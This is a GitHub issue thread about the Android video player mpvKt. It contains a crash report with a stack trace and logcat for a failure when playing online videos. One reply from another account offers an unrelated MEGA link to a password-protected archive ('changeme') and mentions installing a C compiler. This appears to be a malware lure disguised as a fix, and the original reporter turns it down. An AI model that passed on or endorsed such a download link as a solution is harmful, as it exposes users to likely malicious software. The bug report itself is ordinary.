### ISSUE TITLE
Error launching video from online sources.

### ISSUE THREAD

**Issue by Konnor378** [abdallahmehiz/mpvKt#106]
`      App version: 0.1.6 (ac95c8d)
Android version: 13 (33)
Device brand: realme
Device manufacturer: realme
Device model: RMX3370 (RE879AL1)
MPV version: v0.38.0-743-gad7976c33e
ffmpeg version: 0b6d7cd9d9
libplacebo version: v7.349.0 (v7.349.0-9-gefb89342)
      
      Exception:
      java.lang.RuntimeException: Unable to start activity ComponentInfo{live.mehiz.mpvkt/live.mehiz.mpvkt.ui.player.PlayerActivity}: java.lang.IndexOutOfBoundsException: Index 1 out of bounds for length 1
	at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:3872)
	at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:4014)
	at android.app.servertransaction.LaunchActivityItem.execute(LaunchActivityItem.java:111)
	at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:135)
	at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:95)
	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2470)
	at android.os.Handler.dispatchMessage(Handler.java:106)
	at android.os.Looper.loopOnce(Looper.java:240)
	at android.os.Looper.loop(Looper.java:351)
	at android.app.ActivityThread.main(ActivityThread.java:8423)
	at java.lang.reflect.Method.invoke(Native Method)
	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:584)
	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1013)
Caused by: java.lang.IndexOutOfBoundsException: Index 1 out of bounds for length 1
	at jdk.internal.util.Preconditions.outOfBounds(Preconditions.java:64)
	at jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Preconditions.java:70)
	at jdk.internal.util.Preconditions.checkIndex(Preconditions.java:266)
	at java.util.Objects.checkIndex(Objects.java:359)
	at java.util.ArrayList.get(ArrayList.java:434)
	at live.mehiz.mpvkt.ui.player.PlayerActivity.onCreate(SourceFile:607)
	at android.app.Activity.performCreate(Activity.java:8422)
	at android.app.Activity.performCreate(Activity.java:8395)
	at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1403)
	at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:3845)
	... 12 more

      
      Logcat:
      --------- beginning of main
09-29 06:34:31.041 10038 10038 E ive.mehiz.mpvkt: Unknown bits set in runtime_flags: 0x40000000
09-29 06:34:31.041 10038 10038 I ive.mehiz.mpvkt: Using CollectorTypeCC GC.
09-29 06:34:31.043 10038 10038 E ive.mehiz.mpvkt: Not starting debugger since process cannot load the jdwp agent.
09-29 06:34:31.049 10038 10038 W libc    : Access denied finding property "persist.vendor.sys.activitylog"
09-29 06:34:31.049 10038 10038 I OneTrace: Mark active for pid=10038? true
09-29 06:34:31.049 10038 10038 D cutils-dev: otrace_set_tracing_enabled? true
09-29 06:34:31.067 10038 10230 D cutils-dev: properties changed in otrace_seq_number_changed!
09-29 06:34:31.073 10038 10038 D CompatibilityChangeReporter: Compat change id reported: 171979766; UID 10705; state: ENABLED
09-29 06:34:31.073 10038 10038 I oplus.android.OplusFrameworkFactoryImpl: get feature:IOplusAutoResolutionFeature
09-29 06:34:31.073 10038 10038 I oplus.android.OplusFrameworkFactoryImpl: getOplusAutoResolutionFeature
09-29 06:34:31.077 10038 10038 I OplusFeatureCache: Milliseconds spent on init(): 4
09-29 06:34:31.078 10038 10038 D CompactWindowAppManager: initCompactApplicationInfo CompactMode: , NormalMode: 
09-29 06:34:31.081 10038 10038 W libc    : Access denied finding property "ro.odm.prev.product.name"
09-29 06:34:31.082 10038 10038 D LoadedApk: mApplicationInfo overrideDisplayId:null
09-29 06:34:31.084 10038 10038 D nativeloader: Configuring clns-4 for other apk /system_ext/framework/androidx.window.extensions.jar. target_sdk_version=34, uses_libraries=ALL, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.084 10038 10038 D nativeloader: Extending system_exposed_libraries: libbinauralrenderer_wrapper.qti.so:libhoaeffects.qti.so:libSloganJni.oplus.so:libsuperNight.oplus.so:libupdateprof.qti.so:libQOC.qti.so:libthermalclient.qti.so:libdiag_system.qti.so:libqape.qti.so:liblistenjni.qti.so
09-29 06:34:31.086 10038 10038 D nativeloader: Configuring clns-5 for other apk /system_ext/framework/androidx.window.sidecar.jar. target_sdk_version=34, uses_libraries=ALL, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.086 10038 10038 D nativeloader: Extending system_exposed_libraries: libbinauralrenderer_wrapper.qti.so:libhoaeffects.qti.so:libSloganJni.oplus.so:libsuperNight.oplus.so:libupdateprof.qti.so:libQOC.qti.so:libthermalclient.qti.so:libdiag_system.qti.so:libqape.qti.so:liblistenjni.qti.so
09-29 06:34:31.088 10038 10038 I ive.mehiz.mpvkt: Failed to open app image /data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/oat/arm64/base.art Invalid image header in '/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/oat/arm64/base.art'
09-29 06:34:31.088 10038 10038 D nativeloader: Configuring clns-6 for other apk /data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk. target_sdk_version=34, uses_libraries=, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.096 10038 10038 V GraphicsEnvironment: ANGLE Developer option for 'live.mehiz.mpvkt' set to: 'default'
09-29 06:34:31.096 10038 10038 V GraphicsEnvironment: ANGLE GameManagerService for live.mehiz.mpvkt: false
09-29 06:34:31.097 10038 10038 V GraphicsEnvironment: App is not on the allowlist for updatable production driver.
09-29 06:34:31.099 10038 10038 D NetworkSecurityConfig: No Network Security Config specified, using platform default
09-29 06:34:31.099 10038 10038 D NetworkSecurityConfig: No Network Security Config specified, using platform default
09-29 06:34:31.104 10038 10038 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
09-29 06:34:31.104 10038 10038 D ExtensionsLoader: Opened libSchedAssistExtImpl.so
09-29 06:34:31.104 10038 10038 E SchedAssist: ofbOpen failed with error=No such file or directory
09-29 06:34:31.104 10038 10038 E SchedAssist: sysOpen failed with error=No such file or directory
09-29 06:34:31.104 10038 10038 E SchedAssist: sharedImFd failed with error=Permission denied
09-29 06:34:31.106 10038 10038 D OplusGraphicsEvent: OplusGraphicsEventListener create now!
09-29 06:34:31.106 10038 10038 D OplusGraphicsEvent: addEventListener success!
09-29 06:34:31.107 10038 10038 D ScrollOptim [ConfigManager]: initOptConfig: pkg= live.mehiz.mpvkt, mOptEnable= true, mAnimAheadEnable= true, mInsertDefaultNum= 1, mFrameInsertEnableList= {}, mSCEnableList= []
09-29 06:34:31.113 10038 10038 D OplusActivityManager: get AMS extension: android.os.BinderProxy@6c40d83
--------- beginning of system
09-29 06:34:31.114 10038 10038 I ConfigurationController: handleConfigurationChanged: true, config: {1.15 ??mcc??mnc [ru_DE] ldltr sw360dp w360dp h763dp 480dpi nrml long hdr widecg port night finger -keyb/v/h -nav/h winConfig={ mBounds=Rect(0, 0 - 1080, 2400) mAppBounds=Rect(0, 110 - 1080, 2400) mMaxBounds=Rect(0, 0 - 1080, 2400) mDisplayRotation=ROTATION_0 mWindowingMode=fullscreen mDisplayWindowingMode=fullscreen mActivityType=undefined mAlwaysOnTop=undefined mRotation=ROTATION_0} s.49600 fontWeightAdjustment=0mThemeChanged= 0, mThemeChangedFlags= 0, mFlipFont= 0, mAccessibleChanged= -1, mUxIconConfig= 3468921665126662465, mMaterialColor= 2, mUserId= 0, mFontUserId= 0, mFontVariationSettings= 3226, mFoldingAngle = -1.0, mIconPackName= , mDarkModeBackgroundMaxL= 0.0, mDarkModeDialogBgMaxL= 27.0, mDarkModeForegroundMinL= 100.0, mOplusConfigType= 1, mOplusChangedConfigs= 0, OpSans= 4096, mBurmeseFontFlag= 2, mFlag= 0, mPuttDisplayFlag= -1} 
09-29 06:34:31.114 10038 10038 I ConfigurationController: , curconfig: {1.15 ??mcc??mnc [ru_DE] ldltr sw360dp w360dp h763dp 480dpi nrml long hdr widecg port night finger -keyb/v/h -nav/h winConfig={ mBounds=Rect(0, 0 - 1080, 2400) mAppBounds=Rect(0, 110 - 1080, 2400) mMaxBounds=Rect(0, 0 - 1080, 2400) mDisplayRotation=ROTATION_0 mWindowingMode=fullscreen mDisplayWindowingMode=fullscreen mActivityType=undefined mAlwaysOnTop=undefined mRotation=ROTATION_0} s.49600 fontWeightAdjustment=0mThemeChanged= 0, mThemeChangedFlags= 0, mFlipFont= 0, mAccessibleChanged= -1, mUxIconConfig= 3468921665126662465, mMaterialColor= 2, mUserId= 0, mFontUserId= 0, mFontVariationSettings= 3226, mFoldingAngle = -1.0, mIconPackName= , mDarkModeBackgroundMaxL= 0.0, mDarkModeDialogBgMaxL= 27.0, mDarkModeForegroundMinL= 100.0, mOplusConfigType= 1, mOplusChangedConfigs= 0, OpSans= 4096, mBurmeseFontFlag= 2, mFlag= 0, mPuttDisplayFlag= -1} 
09-29 06:34:31.114 10038 10038 I ConfigurationController: android.app.ActivityThread.handleLaunchActivity:3999 android.app.servertransaction.LaunchActivityItem.execute:111 android.app.servertransaction.TransactionExecutor.executeCallbacks:135 android.app.servertransaction.TransactionExecutor.execute:95 android.app.ActivityThread$H.handleMessage:2470 android.os.Handler.dispatchMessage:106 android.os.Looper.loopOnce:240 android.os.Looper.loop:351 android.app.ActivityThread.main:8423 java.lang.reflect.Method.invoke:-2 
09-29 06:34:31.118 10038 10239 E ive.mehiz.mpvkt: Loaded layer handle (13915991741456127685) for layer /my_product/lib64/libcolorx-loader.so
09-29 06:34:31.118 10038 10239 E ive.mehiz.mpvkt: Looking for entrypoint ColorX_Check
09-29 06:34:31.118 10038 10239 E ive.mehiz.mpvkt: Found ColorX_Check for /my_product/lib64/libcolorx-loader.so
09-29 06:34:31.118 10038 10239 E ive.mehiz.mpvkt: Check failed
09-29 06:34:31.122 10038 10038 D AppCompatDelegate: Checking for metadata for AppLocalesMetadataHolderService : Service not found
09-29 06:34:31.128 10038 10038 I oplus.android.OplusFrameworkFactoryImpl: Unknow feature:IOplusTextViewRTLUtilForUG
09-29 06:34:31.137 10038 10038 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
09-29 06:34:31.137 10038 10038 D ExtensionsLoader: Opened libguiextimpl.so
09-29 06:34:31.143 10038 10038 V mpv     : Skipping copy of asset file (exists same size): subfont.ttf
09-29 06:34:31.143 10038 10038 V mpv     : Skipping copy of asset file (exists same size): cacert.pem
09-29 06:34:31.145 10038 10038 W DocumentFile: Failed query: java.lang.NullPointerException: Attempt to invoke interface method 'int android.database.Cursor.getCount()' on a null object reference
09-29 06:34:31.146 10038 10038 E PlayerActivity: Couldn't copy mpv configuration files: User hasn't set any mpvConfig directory
09-29 06:34:31.149 10038 10241 W DocumentFile: Failed query: java.lang.NullPointerException: Attempt to invoke interface method 'int android.database.Cursor.getCount()' on a null object reference
09-29 06:34:31.149 10038 10241 E PlayerActivity: Couldn't copy fonts to application directory: User hasn't set any fonts directory
09-29 06:34:31.185 10038 10038 V mpv     : You're using the 64-bit build of mpv!
09-29 06:34:31.190 10038 10038 D AudioManagerExtImpl: getStreamVolume packageName=live.mehiz.mpvkt, index=0, streamType=3
09-29 06:34:31.191 10038 10038 E mpv     : mpv_set_property(time-pos, 0x7fe0357560) format 4 returned error property unavailable
09-29 06:34:31.191 10038 10038 D AndroidRuntime: Shutting down VM
09-29 06:34:31.193 10038 10250 V mpv     : event: idle
--------- beginning of crash
09-29 06:34:31.194 10038 10038 E AndroidRuntime: FATAL EXCEPTION: main
09-29 06:34:31.194 10038 10038 E AndroidRuntime: Process: live.mehiz.mpvkt, PID: 10038
09-29 06:34:31.194 10038 10038 E AndroidRuntime: java.lang.RuntimeException: Unable to start activity ComponentInfo{live.mehiz.mpvkt/live.mehiz.mpvkt.ui.player.PlayerActivity}: java.lang.IndexOutOfBoundsException: Index 1 out of bounds for length 1
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:3872)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:4014)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.servertransaction.LaunchActivityItem.execute(LaunchActivityItem.java:111)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.servertransaction.TransactionExecutor.executeCallbacks(TransactionExecutor.java:135)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:95)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2470)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.os.Handler.dispatchMessage(Handler.java:106)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.os.Looper.loopOnce(Looper.java:240)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.os.Looper.loop(Looper.java:351)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.ActivityThread.main(ActivityThread.java:8423)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at java.lang.reflect.Method.invoke(Native Method)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:584)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1013)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: Caused by: java.lang.IndexOutOfBoundsException: Index 1 out of bounds for length 1
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at jdk.internal.util.Preconditions.outOfBounds(Preconditions.java:64)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Preconditions.java:70)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at jdk.internal.util.Preconditions.checkIndex(Preconditions.java:266)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at java.util.Objects.checkIndex(Objects.java:359)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at java.util.ArrayList.get(ArrayList.java:434)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at live.mehiz.mpvkt.ui.player.PlayerActivity.onCreate(SourceFile:607)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.Activity.performCreate(Activity.java:8422)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.Activity.performCreate(Activity.java:8395)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1403)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:3845)
09-29 06:34:31.194 10038 10038 E AndroidRuntime: 	... 12 more
09-29 06:34:31.204 10038 10038 I ive.mehiz.mpvkt: System.exit called, status: 0
09-29 06:34:31.204 10038 10038 I AndroidRuntime: VM exiting with result code 0, cleanup skipped.
09-29 06:34:31.232 10204 10204 E ive.mehiz.mpvkt: Unknown bits set in runtime_flags: 0x40000000
09-29 06:34:31.232 10204 10204 I ive.mehiz.mpvkt: Using CollectorTypeCC GC.
09-29 06:34:31.235 10204 10204 E ive.mehiz.mpvkt: Not starting debugger since process cannot load the jdwp agent.
09-29 06:34:31.239 10204 10204 W libc    : Access denied finding property "persist.vendor.sys.activitylog"
09-29 06:34:31.240 10204 10204 I OneTrace: Mark active for pid=10204? true
09-29 06:34:31.240 10204 10204 D cutils-dev: otrace_set_tracing_enabled? true
09-29 06:34:31.241 10204 10270 D cutils-dev: properties changed in otrace_seq_number_changed!
09-29 06:34:31.254 10204 10204 D CompatibilityChangeReporter: Compat change id reported: 171979766; UID 10705; state: ENABLED
09-29 06:34:31.254 10204 10204 I oplus.android.OplusFrameworkFactoryImpl: get feature:IOplusAutoResolutionFeature
09-29 06:34:31.254 10204 10204 I oplus.android.OplusFrameworkFactoryImpl: getOplusAutoResolutionFeature
09-29 06:34:31.258 10204 10204 I OplusFeatureCache: Milliseconds spent on init(): 4
09-29 06:34:31.259 10204 10204 D CompactWindowAppManager: initCompactApplicationInfo CompactMode: , NormalMode: 
09-29 06:34:31.262 10204 10204 W libc    : Access denied finding property "ro.odm.prev.product.name"
09-29 06:34:31.263 10204 10204 D LoadedApk: mApplicationInfo overrideDisplayId:null
09-29 06:34:31.264 10204 10204 D nativeloader: Configuring clns-4 for other apk /system_ext/framework/androidx.window.extensions.jar. target_sdk_version=34, uses_libraries=ALL, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.264 10204 10204 D nativeloader: Extending system_exposed_libraries: libbinauralrenderer_wrapper.qti.so:libhoaeffects.qti.so:libSloganJni.oplus.so:libsuperNight.oplus.so:libupdateprof.qti.so:libQOC.qti.so:libthermalclient.qti.so:libdiag_system.qti.so:libqape.qti.so:liblistenjni.qti.so
09-29 06:34:31.267 10204 10204 D nativeloader: Configuring clns-5 for other apk /system_ext/framework/androidx.window.sidecar.jar. target_sdk_version=34, uses_libraries=ALL, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.267 10204 10204 D nativeloader: Extending system_exposed_libraries: libbinauralrenderer_wrapper.qti.so:libhoaeffects.qti.so:libSloganJni.oplus.so:libsuperNight.oplus.so:libupdateprof.qti.so:libQOC.qti.so:libthermalclient.qti.so:libdiag_system.qti.so:libqape.qti.so:liblistenjni.qti.so
09-29 06:34:31.268 10204 10204 I ive.mehiz.mpvkt: Failed to open app image /data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/oat/arm64/base.art Invalid image header in '/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/oat/arm64/base.art'
09-29 06:34:31.269 10204 10204 D nativeloader: Configuring clns-6 for other apk /data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk. target_sdk_version=34, uses_libraries=, library_path=/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/lib/arm64:/data/app/~~W1iViTIK-TdRCzB_Y4stdw==/live.mehiz.mpvkt-__RkX-qgRt3JG8f4ahtqYg==/base.apk!/lib/arm64-v8a, permitted_path=/data:/mnt/expand:/data/user/0/live.mehiz.mpvkt
09-29 06:34:31.276 10204 10204 V GraphicsEnvironment: ANGLE Developer option for 'live.mehiz.mpvkt' set to: 'default'
09-29 06:34:31.276 10204 10204 V GraphicsEnvironment: ANGLE GameManagerService for live.mehiz.mpvkt: false
09-29 06:34:31.276 10204 10204 V GraphicsEnvironment: App is not on the allowlist for updatable production driver.
09-29 06:34:31.278 10204 10204 D NetworkSecurityConfig: No Network Security Config specified, using platform default
09-29 06:34:31.279 10204 10204 D NetworkSecurityConfig: No Network Security Config specified, using platform default
09-29 06:34:31.283 10204 10204 D ExtensionsLoader: createInstance(64bit) : createExtendedFactory
09-29 06:34:31.283 10204 10204 D ExtensionsLoader: Opened libSchedAssistExtImpl.so
09-29 06:34:31.284 10204 10204 E SchedAssist: ofbOpen failed with error=No such file or directory
09-29 06:34:31.284 10204 10204 E S`

Hi. I get this error when I play videos from online sources. You might think the source is bad, but regular mpv and other players play it just fine.

**Comment by SagarChandra07** [comment]
try this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive codepass: changeme

you may need to install the c compiler

**Comment by Konnor378** [comment]
> try this
> 
> https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA Archive codepass: changeme
> 
> you may need to install the c compiler

Thanks, but I was just looking for a video player based on mpv. I understand that the project is still in development. I just wanted to help identify bugs in the application. In this case, it is a bug in playing videos from online sources.
